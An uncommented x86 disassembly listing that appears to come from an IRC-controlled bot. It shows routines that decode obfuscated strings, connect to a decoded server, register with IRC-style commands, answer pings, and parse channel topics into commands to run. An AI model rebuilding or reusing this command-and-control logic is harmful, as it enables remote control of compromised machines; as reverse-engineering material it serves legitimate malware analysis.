mov esi, [ebp+Dest]
add edi, 5
mov edx, edi
mov ecx, esi
loc_4176F0: ; CODE XREF: sub_417676+92�j
mov al, [ecx]
cmp al, [edx]
jnz short loc_41770E
test al, al
jz short loc_41770A
mov al, [ecx+1]
cmp al, [edx+1]
jnz short loc_41770E
inc ecx
inc ecx
inc edx
inc edx
test al, al
jnz short loc_4176F0
loc_41770A: ; CODE XREF: sub_417676+82�j
xor eax, eax
jmp short loc_417713
; ---------------------------------------------------------------------------
loc_41770E: ; CODE XREF: sub_417676+7E�j
; sub_417676+8A�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_417713: ; CODE XREF: sub_417676+96�j
cmp eax, ebx
jz short loc_417724
mov eax, edi
mov ecx, esi
call sub_419044
test eax, eax
jz short loc_417750
loc_417724: ; CODE XREF: sub_417676+9F�j
xor eax, eax
cmp [ebp+var_4], ebx
jle short loc_41774D
mov ecx, [ebp+var_4]
dec ecx
loc_41772F: ; CODE XREF: sub_417676+CF�j
cmp eax, ecx
jz short loc_417741
mov edx, [ebp+eax*4+var_81C]
mov [ebp+eax*4+Dest], edx
loc_417741: ; CODE XREF: sub_417676+BB�j
inc eax
cmp eax, [ebp+var_4]
jl short loc_41772F
mov esi, [ebp+Dest]
loc_41774D: ; CODE XREF: sub_417676+B3�j
dec [ebp+var_4]
loc_417750: ; CODE XREF: sub_417676+AC�j
cmp byte ptr [ebp+var_8], bl
jz short loc_417758
dec [ebp+var_4]
loc_417758: ; CODE XREF: sub_417676+DD�j
mov al, [esi]
cmp al, byte_424FE8
jnz loc_417836
mov eax, esi
lea ecx, [eax+1]
loc_41776B: ; CODE XREF: sub_417676+FA�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41776B
sub eax, ecx
push eax ; Count
lea eax, [esi+1]
push eax ; Source
push esi ; Dest
call _strncpy
mov eax, dword_433C40
mov esi, [eax]
mov ebx, offset dword_433C3C
mov edi, ebx
add esp, 0Ch
mov [ebp+var_C], esi
mov [ebp+var_10], edi
loc_417796: ; CODE XREF: sub_417676+192�j
test edi, edi
mov eax, dword_433C40
mov [ebp+var_14], eax
jz short loc_4177A6
cmp edi, ebx
jz short loc_4177AB
loc_4177A6: ; CODE XREF: sub_417676+12A�j
call __invalid_parameter_noinfo
loc_4177AB: ; CODE XREF: sub_417676+12E�j
cmp esi, [ebp+var_14]
jz loc_417836
test edi, edi
jnz short loc_4177BD
call __invalid_parameter_noinfo
loc_4177BD: ; CODE XREF: sub_417676+140�j
cmp esi, [edi+4]
jnz short loc_4177C7
call __invalid_parameter_noinfo
loc_4177C7: ; CODE XREF: sub_417676+14A�j
mov ecx, [ebp+Dest]
lea eax, [esi+0Ch]
loc_4177D0: ; CODE XREF: sub_417676+172�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_4177EE
test dl, dl
jz short loc_4177EA
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_4177EE
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_4177D0
loc_4177EA: ; CODE XREF: sub_417676+162�j
xor eax, eax
jmp short loc_4177F3
; ---------------------------------------------------------------------------
loc_4177EE: ; CODE XREF: sub_417676+15E�j
; sub_417676+16A�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_4177F3: ; CODE XREF: sub_417676+176�j
test eax, eax
jz short loc_41780A
lea edi, [ebp+var_20]
lea esi, [ebp+var_10]
call sub_40168C
mov esi, [ebp+var_C]
mov edi, [ebp+var_10]
jmp short loc_417796
; ---------------------------------------------------------------------------
loc_41780A: ; CODE XREF: sub_417676+17F�j
cmp esi, [edi+4]
jnz short loc_417814
call __invalid_parameter_noinfo
loc_417814: ; CODE XREF: sub_417676+197�j
mov ecx, [esi+8]
mov eax, [ecx]
lea edx, [ebp+Dest]
push edx
mov edx, [ebp+var_4]
dec edx
push edx
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+var_8]
push [ebp+arg_4]
call dword ptr [eax]
loc_417836: ; CODE XREF: sub_417676+EA�j
; sub_417676+138�j
pop edi
pop esi
pop ebx
leave
retn 18h
sub_417676 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41783D proc near ; CODE XREF: sub_417F01+107�p
var_10F48 = dword ptr -10F48h
var_10F34 = dword ptr -10F34h
var_10734 = dword ptr -10734h
Str = dword ptr -10730h
var_1072C = byte ptr -1072Ch
var_1062C = byte ptr -1062Ch
var_1052C = byte ptr -1052Ch
var_1042C = byte ptr -1042Ch
var_72C = byte ptr -72Ch
var_72B = byte ptr -72Bh
var_62C = dword ptr -62Ch
Dest = byte ptr -52Ch
var_52B = byte ptr -52Bh
Source = byte ptr -52Ah
var_32C = byte ptr -32Ch
var_32B = byte ptr -32Bh
var_22C = byte ptr -22Ch
var_22B = byte ptr -22Bh
var_1AC = dword ptr -1ACh
var_A8 = byte ptr -0A8h
var_A7 = byte ptr -0A7h
var_78 = dword ptr -78h
var_54 = byte ptr -54h
var_53 = byte ptr -53h
var_44 = byte ptr -44h
var_43 = byte ptr -43h
var_38 = byte ptr -38h
var_37 = byte ptr -37h
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
Args = byte ptr -20h
var_1F = byte ptr -1Fh
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10F38h
call __alloca_probe
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, 1FFh
xor ebx, ebx
push esi ; size_t
mov [ebp+var_10734], eax
lea eax, [ebp+var_52B]
mov edi, ecx
push ebx ; int
push eax ; void *
mov [ebp+Str], edi
mov [ebp+Dest], bl
call _memset
add esp, 0Ch
push edi
push offset aS_5 ; "%s"
lea eax, [ebp+Dest]
push esi ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+Dest]
add esp, 10h
lea edi, [eax+1]
loc_4178A5: ; CODE XREF: sub_41783D+6D�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4178A5
sub eax, edi
mov [ebp+eax+Dest], bl
lea eax, [ebp+Dest]
push offset SubStr ; " :"
push eax ; Str
call _strstr
push eax
push offset aS_6 ; "%s"
lea eax, [ebp+Dest]
push esi ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+Dest]
add esp, 18h
lea esi, [eax+1]
loc_4178E5: ; CODE XREF: sub_41783D+AD�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4178E5
sub eax, esi
mov [ebp+eax+Dest], bl
lea eax, [ebp+Dest]
lea esi, [eax+1]
loc_4178FE: ; CODE XREF: sub_41783D+C6�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4178FE
sub eax, esi
push eax ; Count
lea eax, [ebp+Source]
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _strncpy
add esp, 0Ch
push offset asc_42025C ; " "
push [ebp+Str] ; Str
call _strtok
cmp eax, ebx
pop ecx
pop ecx
jz short loc_41797F
xor esi, esi
loc_417936: ; CODE XREF: sub_41783D+140�j
push eax
push offset aS_7 ; "%s"
lea edi, [ebp+esi+var_1072C]
push 0FFh ; Count
push edi ; Dest
call __snprintf
mov eax, edi
add esp, 10h
lea edi, [eax+1]
loc_417956: ; CODE XREF: sub_41783D+11E�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_417956
sub eax, edi
add eax, esi
push offset asc_420264 ; " "
push ebx ; Str
mov [ebp+eax+var_1072C], bl
call _strtok
pop ecx
add esi, 100h
cmp eax, ebx
pop ecx
jnz short loc_417936
loc_41797F: ; CODE XREF: sub_41783D+F5�j
xor eax, eax
mov [ebp+var_2C], bl
lea edi, [ebp+var_2B]
stosd
stosd
xor eax, eax
mov [ebp+var_38], bl
lea edi, [ebp+var_37]
stosd
stosd
xor eax, eax
mov [ebp+var_54], bl
lea edi, [ebp+var_53]
stosd
stosd
stosd
xor eax, eax
mov [ebp+Args], bl
lea edi, [ebp+var_1F]
stosd
push 0FFh ; size_t
stosd
lea eax, [ebp+var_32B]
push ebx ; int
push eax ; void *
mov [ebp+var_32C], bl
call _memset
add esp, 0Ch
push 2Fh ; size_t
lea eax, [ebp+var_A7]
push ebx ; int
push eax ; void *
mov [ebp+var_A8], bl
call _memset
xor eax, eax
mov [ebp+var_14], bl
lea edi, [ebp+var_13]
stosd
stosd
xor eax, eax
mov [ebp+var_44], bl
lea edi, [ebp+var_43]
stosd
add esp, 0Ch
push 7Fh ; size_t
stosd
lea eax, [ebp+var_22B]
push ebx ; int
push eax ; void *
mov [ebp+var_22C], bl
call _memset
add esp, 0Ch
push 9
lea esi, [ebp+var_2C]
mov ebx, offset asc_425543 ; "ÅÜÛÒ"
call sub_4196D1
pop ecx
push 9
lea esi, [ebp+var_38]
mov ebx, offset asc_425555 ; "ÞÜÖÞ"
call sub_4196D1
pop ecx
push 0Dh
lea esi, [ebp+var_54]
mov ebx, offset asc_425570 ; "ÅÇÜÃØÆÒ"
call sub_4196D1
pop ecx
lea ecx, [ebp+var_2C]
lea eax, [ebp+var_1072C]
loc_417A40: ; CODE XREF: sub_41783D+21B�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_417A5E
test dl, dl
jz short loc_417A5A
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_417A5E
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_417A40
loc_417A5A: ; CODE XREF: sub_41783D+20B�j
xor eax, eax
jmp short loc_417A63
; ---------------------------------------------------------------------------
loc_417A5E: ; CODE XREF: sub_41783D+207�j
; sub_41783D+213�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_417A63: ; CODE XREF: sub_41783D+21F�j
test eax, eax
jnz short loc_417AA7
push 9
lea esi, [ebp+Args]
mov ebx, offset asc_42554C ; "ÅÚÛÒ"
call sub_4196D1
mov edi, [ebp+var_10734]
pop ecx
lea eax, [ebp+var_1062C]
push eax
mov eax, esi
push eax ; Args
push offset aSS_4 ; "%s %s\r\n"
call sub_4172CC
add esp, 0Ch
test al, al
jnz short loc_417A9F
loc_417A98: ; CODE XREF: sub_41783D+333�j
xor al, al
jmp loc_417EF0
; ---------------------------------------------------------------------------
loc_417A9F: ; CODE XREF: sub_41783D+259�j
xor eax, eax
lea edi, [ebp+Args]
stosd
stosd
stosb
loc_417AA7: ; CODE XREF: sub_41783D+228�j
lea ecx, [ebp+var_38]
lea eax, [ebp+var_1062C]
loc_417AB0: ; CODE XREF: sub_41783D+28B�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_417ACE
test dl, dl
jz short loc_417ACA
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_417ACE
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_417AB0
loc_417ACA: ; CODE XREF: sub_41783D+27B�j
xor eax, eax
jmp short loc_417AD3
; ---------------------------------------------------------------------------
loc_417ACE: ; CODE XREF: sub_41783D+277�j
; sub_41783D+283�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_417AD3: ; CODE XREF: sub_41783D+28F�j
test eax, eax
jnz loc_417B75
push 100h
lea esi, [ebp+var_32C]
mov ebx, offset dword_424ED0
call sub_4196D1
pop ecx
mov ecx, esi
lea eax, [ebp+var_1052C]
loc_417AF9: ; CODE XREF: sub_41783D+2D4�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_417B17
test dl, dl
jz short loc_417B13
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_417B17
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_417AF9
loc_417B13: ; CODE XREF: sub_41783D+2C4�j
xor eax, eax
jmp short loc_417B1C
; ---------------------------------------------------------------------------
loc_417B17: ; CODE XREF: sub_41783D+2C0�j
; sub_41783D+2CC�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_417B1C: ; CODE XREF: sub_41783D+2D8�j
test eax, eax
jnz loc_417EEE
push 9
lea esi, [ebp+var_14]
mov ebx, offset asc_42555E ; "ßÚÜÛ"
call sub_4196D1
pop ecx
push 30h
lea esi, [ebp+var_A8]
mov ebx, offset dword_424FD0
call sub_4196D1
mov edi, [ebp+var_10734]
pop ecx
mov eax, esi
push eax
lea eax, [ebp+var_32C]
push eax
lea eax, [ebp+var_14]
push eax ; Args
push offset aSSS_1 ; "%s %s %s\r\n"
call sub_4172CC
add esp, 10h
loc_417B68: ; CODE XREF: sub_41783D+3E0�j
test al, al
jnz loc_417EEE
jmp loc_417A98
; ---------------------------------------------------------------------------
loc_417B75: ; CODE XREF: sub_41783D+298�j
push 4
mov edi, offset a001 ; "001"
lea esi, [ebp+var_1062C]
pop ecx
xor eax, eax
repe cmpsb
jnz loc_417C22
push 9
lea esi, [ebp+var_14]
mov ebx, offset asc_42555E ; "ßÚÜÛ"
call sub_4196D1
pop ecx
push 9
lea esi, [ebp+var_44]
mov ebx, offset asc_425567 ; "ØÚÑÐ"
call sub_4196D1
lea esi, [ebp+var_32C]
mov ebx, offset dword_424ED0
mov [esp+10F48h+var_10F48], 100h
call sub_4196D1
pop ecx
push 30h
lea esi, [ebp+var_A8]
mov ebx, offset dword_424FD0
call sub_4196D1
pop ecx
push 80h
lea esi, [ebp+var_22C]
mov ebx, offset byte_424FE9
call sub_4196D1
mov edi, [ebp+var_10734]
pop ecx
lea eax, [ebp+var_A8]
push eax
lea eax, [ebp+var_32C]
push eax
lea eax, [ebp+var_14]
push eax
mov eax, esi
push eax
lea eax, [edi+5]
push eax
lea eax, [ebp+var_44]
push eax ; Args
push offset aSSSSSS ; "%s %s %s\r\n%s %s %s\r\n"
call sub_4172CC
add esp, 1Ch
jmp loc_417B68
; ---------------------------------------------------------------------------
loc_417C22: ; CODE XREF: sub_41783D+34A�j
lea ecx, [ebp+var_54]
lea eax, [ebp+var_1062C]
loc_417C2B: ; CODE XREF: sub_41783D+406�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_417C49
test dl, dl
jz short loc_417C45
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_417C49
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_417C2B
loc_417C45: ; CODE XREF: sub_41783D+3F6�j
xor eax, eax
jmp short loc_417C4E
; ---------------------------------------------------------------------------
loc_417C49: ; CODE XREF: sub_41783D+3F2�j
; sub_41783D+3FE�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_417C4E: ; CODE XREF: sub_41783D+40A�j
test eax, eax
jz short loc_417C6A
push 4
mov edi, offset a332 ; "332"
lea esi, [ebp+var_1062C]
pop ecx
xor eax, eax
repe cmpsb
jnz loc_417EEE
loc_417C6A: ; CODE XREF: sub_41783D+413�j
push 8
pop ecx
xor eax, eax
mov byte ptr [ebp+var_78], 0
lea edi, [ebp+var_78+1]
rep stosd
mov ebx, 0FFh
push ebx ; size_t
stosw
xor esi, esi
lea eax, [ebp+var_1AC+1]
push esi ; int
push eax ; void *
mov byte ptr [ebp+Str], 0
mov byte ptr [ebp+var_1AC], 0
call _memset
add esp, 0Ch
push ebx ; size_t
lea eax, [ebp+var_62C+1]
push esi ; int
push eax ; void *
mov byte ptr [ebp+var_62C], 0
call _memset
add esp, 0Ch
push ebx ; size_t
lea eax, [ebp+var_72B]
push esi ; int
push eax ; void *
mov [ebp+var_72C], 0
call _memset
add esp, 0Ch
lea eax, [ebp+var_1072C]
push offset asc_42029C ; " :"
push eax ; Str
call _strtok
push eax
push offset aS_8 ; "%s"
lea eax, [ebp+var_62C]
push ebx ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+var_62C]
add esp, 18h
lea esi, [eax+1]
loc_417D00: ; CODE XREF: sub_41783D+4C8�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417D00
sub eax, esi
mov byte ptr [ebp+eax+var_62C], cl
lea eax, [ebp+var_1072C]
push offset asc_4202A4 ; "!"
push eax ; Str
call _strtok
push eax
push offset aS_9 ; "%s"
lea eax, [ebp+var_78]
push 22h ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+var_78]
add esp, 18h
lea esi, [eax+1]
loc_417D3B: ; CODE XREF: sub_41783D+503�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417D3B
sub eax, esi
mov byte ptr [ebp+eax+var_78], cl
lea eax, [ebp+var_78]
lea esi, [eax+1]
loc_417D4E: ; CODE XREF: sub_41783D+516�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417D4E
sub eax, esi
push eax ; Count
lea eax, [ebp+var_78+1]
push eax ; Source
lea eax, [ebp+var_78]
push eax ; Dest
call _strncpy
add esp, 0Ch
push 4
mov edi, offset a332_0 ; "332"
lea esi, [ebp+var_1062C]
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_417DB4
lea eax, [ebp+var_1042C]
push eax
push offset aS_10 ; "%s"
lea eax, [ebp+var_1AC]
push ebx ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+var_1AC]
add esp, 10h
lea edx, [eax+1]
loc_417DA1: ; CODE XREF: sub_41783D+569�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417DA1
mov byte ptr [ebp+Str], 1
jmp loc_417E41
; ---------------------------------------------------------------------------
loc_417DB4: ; CODE XREF: sub_41783D+53D�j
mov esi, [ebp+var_10734]
add esi, 5
lea eax, [ebp+var_1052C]
loc_417DC3: ; CODE XREF: sub_41783D+59E�j
mov cl, [eax]
cmp cl, [esi]
jnz short loc_417DE1
test cl, cl
jz short loc_417DDD
mov cl, [eax+1]
cmp cl, [esi+1]
jnz short loc_417DE1
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_417DC3
loc_417DDD: ; CODE XREF: sub_41783D+58E�j
xor eax, eax
jmp short loc_417DE6
; ---------------------------------------------------------------------------
loc_417DE1: ; CODE XREF: sub_41783D+58A�j
; sub_41783D+596�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_417DE6: ; CODE XREF: sub_41783D+5A2�j
test eax, eax
jnz short loc_417E15
lea eax, [ebp+var_78]
push eax
push offset aS_11 ; "%s"
lea eax, [ebp+var_1AC]
push ebx ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+var_1AC]
add esp, 10h
lea edx, [eax+1]
loc_417E0C: ; CODE XREF: sub_41783D+5D4�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417E0C
jmp short loc_417E41
; ---------------------------------------------------------------------------
loc_417E15: ; CODE XREF: sub_41783D+5AB�j
lea eax, [ebp+var_1052C]
push eax
push offset aS_12 ; "%s"
lea eax, [ebp+var_1AC]
push ebx ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+var_1AC]
add esp, 10h
lea edx, [eax+1]
loc_417E3A: ; CODE XREF: sub_41783D+602�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417E3A
loc_417E41: ; CODE XREF: sub_41783D+572�j
; sub_41783D+5D6�j
sub eax, edx
push 100h
lea esi, [ebp+var_72C]
mov ebx, offset byte_425021
mov byte ptr [ebp+eax+var_1AC], 0
call sub_4196D1
pop ecx
lea eax, [ebp+var_62C]
mov ecx, esi
call sub_419044
test eax, eax
jnz short loc_417E7A
cmp byte ptr [ebp+Str], al
jz short loc_417EEE
loc_417E7A: ; CODE XREF: sub_41783D+633�j
xor edi, edi
cmp byte ptr [ebp+Str], 0
lea eax, [ebp+Dest]
jz short loc_417E92
push offset asc_4202BC ; ";"
jmp short loc_417E97
; ---------------------------------------------------------------------------
loc_417E92: ; CODE XREF: sub_41783D+64C�j
push offset asc_4202C0 ; ";"
loc_417E97: ; CODE XREF: sub_41783D+653�j
push eax ; Str
call _strtok
jmp short loc_417EB3
; ---------------------------------------------------------------------------
loc_417E9F: ; CODE XREF: sub_41783D+67A�j
push offset asc_4202C4 ; ";"
push 0 ; Str
mov [ebp+edi*4+var_10F34], eax
call _strtok
inc edi
loc_417EB3: ; CODE XREF: sub_41783D+660�j
test eax, eax
pop ecx
pop ecx
jnz short loc_417E9F
xor esi, esi
test edi, edi
jle short loc_417EEE
loc_417EBF: ; CODE XREF: sub_41783D+6AF�j
push [ebp+esi*4+var_10F34] ; Str
lea eax, [ebp+var_1AC]
push eax ; int
lea eax, [ebp+var_62C]
push eax ; int
lea eax, [ebp+var_78]
push eax ; int
push [ebp+Str] ; int
push [ebp+var_10734] ; int
call sub_417676
inc esi
cmp esi, edi
jl short loc_417EBF
loc_417EEE: ; CODE XREF: sub_41783D+2E1�j
; sub_41783D+32D�j ...
mov al, 1
loc_417EF0: ; CODE XREF: sub_41783D+25D�j
mov ecx, [ebp+var_8]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn 4
sub_41783D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417F01 proc near ; CODE XREF: .text:0041C039�p
var_20414 = dword ptr -20414h
Dest = dword ptr -20410h
var_2040C = dword ptr -2040Ch
var_20408 = byte ptr -20408h
Str = byte ptr -408h
var_407 = byte ptr -407h
var_4 = dword ptr -4
push ebp
mov ebp, esp
mov eax, 20414h
call __alloca_probe
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
push edi
mov esi, 3FFh
xor ebx, ebx
push esi ; size_t
lea eax, [ebp+var_407]
mov edi, ecx
push ebx ; int
push eax ; void *
mov [ebp+var_20414], edi
mov [ebp+Str], bl
call _memset
add esp, 0Ch
push ebx
push esi
lea eax, [ebp+Str]
push eax
push dword ptr [edi]
mov [ebp+var_2040C], ebx
call ds:dword_41D270 ; recv
test eax, eax
jz loc_418016
lea eax, [ebp+Str]
lea edx, [eax+1]
loc_417F69: ; CODE XREF: sub_417F01+6D�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_417F69
sub eax, edx
mov [ebp+eax+Str], bl
lea eax, [ebp+Str]
push offset asc_420238 ; "\r\n"
push eax ; Str
call _strtok
push 20000h ; size_t
mov edi, eax
lea eax, [ebp+var_20408]
push ebx ; int
push eax ; void *
call _memset
add esp, 14h
cmp edi, ebx
mov esi, 200h
jz short loc_417FEC
lea eax, [ebp+var_20408]
mov [ebp+Dest], eax
loc_417FB6: ; CODE XREF: sub_417F01+E9�j
push edi
push offset aS_18 ; "%s"
push 1FFh ; Count
push [ebp+Dest] ; Dest
call __snprintf
push offset asc_420240 ; "\r\n"
push ebx ; Str
call _strtok
add [ebp+Dest], esi
add esp, 18h
inc [ebp+var_2040C]
mov edi, eax
cmp edi, ebx
jnz short loc_417FB6
loc_417FEC: ; CODE XREF: sub_417F01+A7�j
cmp [ebp+var_2040C], ebx
jle short loc_418012
mov ebx, [ebp+var_2040C]
lea edi, [ebp+var_20408]
loc_418000: ; CODE XREF: sub_417F01+10F�j
push [ebp+var_20414]
mov ecx, edi
call sub_41783D
add edi, esi
dec ebx
jnz short loc_418000
loc_418012: ; CODE XREF: sub_417F01+F1�j
mov al, 1
jmp short loc_418020
; ---------------------------------------------------------------------------
loc_418016: ; CODE XREF: sub_417F01+59�j
push dword ptr [edi]
call ds:dword_41D224 ; closesocket
xor al, al
loc_418020: ; CODE XREF: sub_417F01+113�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_417F01 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41802F proc near ; CODE XREF: .text:0041C027�p
var_450 = dword ptr -450h
var_44C = dword ptr -44Ch
var_448 = byte ptr -448h
var_447 = byte ptr -447h
var_444 = byte ptr -444h
var_443 = byte ptr -443h
var_440 = word ptr -440h
var_43E = word ptr -43Eh
var_43C = byte ptr -43Ch
var_430 = byte ptr -430h
var_42F = byte ptr -42Fh
var_230 = byte ptr -230h
var_22F = byte ptr -22Fh
var_30 = byte ptr -30h
var_2F = byte ptr -2Fh
var_24 = byte ptr -24h
var_23 = byte ptr -23h
Args = byte ptr -18h
var_17 = byte ptr -17h
Dest = byte ptr -0Ch
var_B = byte ptr -0Bh
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 454h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 0
push 1
mov edi, ecx
push 2
mov [ebp+var_450], edi
mov ebx, edx
mov [ebp+var_44C], eax
call ds:dword_41D27C ; socket
cmp eax, 0FFFFFFFFh
mov [edi], eax
jnz short loc_418079
push eax
loc_41806C: ; CODE XREF: sub_41802F+8B�j
call ds:dword_41D224 ; closesocket
xor al, al
jmp loc_41828B
; ---------------------------------------------------------------------------
loc_418079: ; CODE XREF: sub_41802F+3A�j
push 1FFh ; size_t
lea eax, [ebp+var_22F]
push 0 ; int
push eax ; void *
mov [ebp+var_230], 0
call _memset
add esp, 0Ch
push 200h
lea esi, [ebp+var_230]
call sub_4196D1
pop ecx
mov eax, esi
push eax
call ds:dword_41D23C ; gethostbyname
mov esi, eax
xor ebx, ebx
cmp esi, ebx
jnz short loc_4180BC
loc_4180B8: ; CODE XREF: sub_41802F+E7�j
push dword ptr [edi]
jmp short loc_41806C
; ---------------------------------------------------------------------------
loc_4180BC: ; CODE XREF: sub_41802F+87�j
push 200h ; size_t
lea eax, [ebp+var_230]
push ebx ; int
push eax ; void *
call _memset
movsx eax, word ptr [esi+0Ah]
add esp, 0Ch
push eax
mov eax, [esi+0Ch]
push dword ptr [eax]
lea eax, [ebp+var_43C]
push eax
call unknown_libname_61 ; Microsoft VisualC 2-8/net runtime
add esp, 0Ch
push [ebp+arg_4]
mov [ebp+var_440], 2
call ds:dword_41D278 ; htons
mov [ebp+var_43E], ax
push 10h
lea eax, [ebp+var_440]
push eax
push dword ptr [edi]
call ds:dword_41D240 ; connect
test eax, eax
jnz short loc_4180B8
mov eax, [ebp+var_44C]
lea edx, [eax+1] ; char
loc_418121: ; CODE XREF: sub_41802F+F7�j
mov cl, [eax] ; unsigned int
inc eax
cmp cl, bl
jnz short loc_418121
sub eax, edx
jz short loc_418197
xor eax, eax
mov [ebp+Args], bl
lea edi, [ebp+var_17]
stosd
push 1FFh ; size_t
stosd
lea eax, [ebp+var_42F]
push ebx ; int
push eax ; void *
mov [ebp+var_430], bl
call _memset
mov ebx, [ebp+var_44C]
add esp, 0Ch
push 200h
lea esi, [ebp+var_430]
call sub_4196D1
pop ecx
push 9
lea esi, [ebp+Args]
mov ebx, offset asc_425531 ; "ÅÔÆÆ"
call sub_4196D1
mov edi, [ebp+var_450]
pop ecx
lea eax, [ebp+var_430]
push eax
mov eax, esi
push eax ; Args
push offset aSS_5 ; "%s %s\r\n"
call sub_4172CC
add esp, 0Ch
xor ebx, ebx
loc_418197: ; CODE XREF: sub_41802F+FB�j
xor eax, eax
mov [ebp+var_24], bl
lea edi, [ebp+var_23]
stosd
stosd
xor eax, eax
mov [ebp+var_30], bl
lea edi, [ebp+var_2F]
stosd
stosd
xor eax, eax
mov [ebp+Dest], bl
lea edi, [ebp+var_B]
stosd
stosw
xor eax, eax
push ebx
mov [ebp+var_448], bl
lea edi, [ebp+var_447]
stosw
push 3
mov [ebp+var_444], bl
lea edi, [ebp+var_443]
pop ecx
lea esi, [ebp+var_448]
stosw
call sub_418E51
pop ecx
push ebx
push 3
lea esi, [ebp+var_444]
call sub_418E1F
xor eax, eax
lea edi, [ebp+Dest]
stosd
stosw
stosb
mov eax, esi
push eax
lea eax, [ebp+var_448]
push eax
push offset aSS_6 ; "%s-%s"
lea eax, [ebp+Dest]
push 6 ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+Dest]
add esp, 1Ch
lea esi, [eax+1]
loc_41821E: ; CODE XREF: sub_41802F+1F4�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41821E
sub eax, esi
mov [ebp+eax+Dest], bl
xor eax, eax
lea edi, [ebp+var_448]
stosw
stosb
xor eax, eax
lea edi, [ebp+var_444]
stosw
push 9
lea esi, [ebp+var_24]
mov ebx, offset asc_425528 ; "ÛÜÖÞ"
stosb
call sub_4196D1
pop ecx
push 9
lea esi, [ebp+var_30]
mov ebx, offset asc_42553A ; "ÀÆÐÇ"
call sub_4196D1
mov edi, [ebp+var_450]
pop ecx
lea ebx, [edi+5]
call sub_41748B
push ebx
lea eax, [ebp+Dest]
push eax
mov eax, esi
push eax
push ebx
lea eax, [ebp+var_24]
push eax ; Args
push offset aSSSS00S ; "%s %s\r\n%s %s 0 0 :%s\r\n"
call sub_4172CC
add esp, 18h
mov al, 1
loc_41828B: ; CODE XREF: sub_41802F+45�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn 8
sub_41802F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41829C proc near ; CODE XREF: sub_418301+3E�p
var_10 = dword ptr -10h
Args = byte ptr -0Ch
var_B = byte ptr -0Bh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov [ebp+var_10], eax
xor eax, eax
mov [ebp+Args], 0
lea edi, [ebp+var_B]
push 5
lea esi, [ebp+Args]
mov ebx, offset asc_425528 ; "ÛÜÖÞ"
stosd
call sub_4196D1
mov ebx, [ebp+var_10]
pop ecx
add ebx, 5
call sub_41748B
push ebx
mov eax, esi
push eax ; Args
push offset aSS_7 ; "%s %s\r\n"
mov edi, offset dword_4269BC
call sub_4172CC
mov ecx, [ebp+var_4]
add esp, 0Ch
pop edi
pop esi
xor ecx, ebp
pop ebx
